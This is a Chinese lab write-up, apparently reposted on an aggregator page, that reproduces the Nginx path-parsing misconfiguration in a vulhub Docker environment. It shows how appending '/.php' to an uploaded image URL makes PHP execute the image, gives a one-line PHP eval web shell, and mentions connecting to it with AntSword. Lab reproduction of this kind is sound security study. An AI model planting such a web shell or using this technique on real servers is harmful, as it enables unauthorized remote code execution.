Nginx 解析漏洞复现-低调大师

Nginx 解析漏洞复现

2018-09-26 1049

漏洞环境搭建

时间有限，漏洞环境搭建教程简单，在此不再赘述。
具体项目地址：https://github.com/vulhub/vulhub
搭建教程及说明可参考：https://vulhub.org/
-还是挺简单的-

Nginx 解析漏洞复现步骤如下：

靶机环境

CentOS7
nginx/1.15.3
PHP Version 7.2.10

由此可知，该漏洞与Nginx、php版本无关，属于用户配置不当造成的解析漏洞。

启动环境

[root@localhost ~]# cd vulhub/nginx/nginx_parsing_vulnerability/
[root@localhost nginx_parsing_vulnerability]# systemctl start docker.service 
[root@localhost nginx_parsing_vulnerability]# docker-compose build
[root@localhost nginx_parsing_vulnerability]# docker-compose up -d

复现
1). 访问 http://IP/uploadfiles/nginx.png 如下所示：

1.png

2). 访问 http://IP/uploadfiles/nginx.png/.php 如下所示：

2.png

通过测试可以看出这就是传说中的nginx解析漏洞：在/nginx.png后加/.php会将nginx.png当成php解析

利用此解析漏洞拿webshell

3.png

一句话：

<?php eval($_POST['zzqsmile'])?>

4.png

最后要注意的是做完漏洞测试实验后记得移除环境

[root@localhost nginx_parsing_vulnerability]# docker-compose down
Stopping nginxparsingvulnerability_nginx_1 ... done
Stopping nginxparsingvulnerability_php_1 ... done
Removing nginxparsingvulnerability_nginx_1 ... done
Removing nginxparsingvulnerability_php_1 ... done
Removing network nginxparsingvulnerability_default
[root@localhost nginx_parsing_vulnerability]#

在拿webshell时候本来应该很简单，但是开始怎么做菜刀都不能连接成功，后来排错，最后得出可能由于环境问题，菜刀连接不上，不得不用这个之前不知道的蚁剑神器了，弄的我怀疑人生，换个工具一下就连接上，没毛病。

中国蚁剑
蚁剑地址：https://github.com/AntSwordProject/antSword/releases
官方加载器：https://github.com/AntSwordProject/AntSword-Loader

微信关注我们

原文链接：https://yq.aliyun.com/articles/666671

转载内容版权归作者及来源网站所有！

低调大师中文资讯倾力打造互联网数据资讯、行业资源、电子商务、移动互联网、网络营销平台。持续更新报道IT业界、互联网、市场资讯、驱动更新,是最及时权威的产业资讯及硬件资讯报道平台。

Linux学习的回顾总结

Linux的学习也告一阶段了，其实学Linux也单纯是想着体验下使用双系统的感觉，想和在window系统一样日常的使用下Linux系统，所以才去学了些许知识，现在可以在Linux下用idea写Java，用网易云音乐听音乐，使用QQ微信等等基本功能，我的目的也达到了。今天就简单回顾看看之前自己写的几篇文章。一、学习在VMware安装linux，熟悉些基本命令二、尝试重装系统和安装双系统三、福利篇——收集了在linux系统下解决的各种问题的文章链接 ~~~~~~~~~~~~~~~~~~~2018-09-27记录于此

2018-09-27

669

安装node.js 简单的说 Node.js 就是运行在服务端的 JavaScript。Node.js 是一个基于Chrome JavaScript 运行时建立的一个平台。Node.js是一个事件驱动I/O服务端JavaScript环境，基于Google的V8引擎，V8引擎执行Javascript的速度非常快，性能非常好。首先更新源node.js的yum源这里我们安装最新V8.x版本 # curl --silent --location https://rpm.nodesource.com/setup_8.x | bash - yum安装node.js # yum install -y nodejs 使用npm国内阿里源 # npm config set registry=https://registry.npm.taobao.org 查看node.js版本 # node -v 安装node.js版本管理器n # npm install -g n 版本管理 // 安装指定版本 # n <version> // 安装稳定版本 # n stable // 安装最新版本 # n...

2018-09-27

845

资源下载

更多资源

Mario

马里奥是站在游戏界顶峰的超人气多面角色。马里奥靠吃蘑菇成长，特征是大鼻子、头戴帽子、身穿背带裤，还留着胡子。与他的双胞胎兄弟路易基一起，长年担任任天堂的招牌角色。

腾讯云软件源

为解决软件依赖安装时官方源访问速度慢的问题，腾讯云为一些软件搭建了缓存服务。您可以通过使用腾讯云软件源站来提升依赖包的安装速度。为了方便用户自由搭建服务架构，目前腾讯云软件源站支持公网访问和内网访问。

Rocky Linux

Rocky Linux（中文名：洛基）是由Gregory Kurtzer于2020年12月发起的企业级Linux发行版，作为CentOS稳定版停止维护后与RHEL（Red Hat Enterprise Linux）完全兼容的开源替代方案，由社区拥有并管理，支持x86_64、aarch64等架构。其通过重新编译RHEL源代码提供长期稳定性，采用模块化包装和SELinux安全架构，默认包含GNOME桌面环境及XFS文件系统，支持十年生命周期更新。

Sublime Text

Sublime Text具有漂亮的用户界面和强大的功能，例如代码缩略图，Python的插件，代码段等。还可自定义键绑定，菜单和工具栏。Sublime Text 的主要功能包括：拼写检查，书签，完整的 Python API ， Goto 功能，即时项目切换，多选择，多窗口等等。Sublime Text 是一个跨平台的编辑器，同时支持Windows、Linux、Mac OS X等操作系统。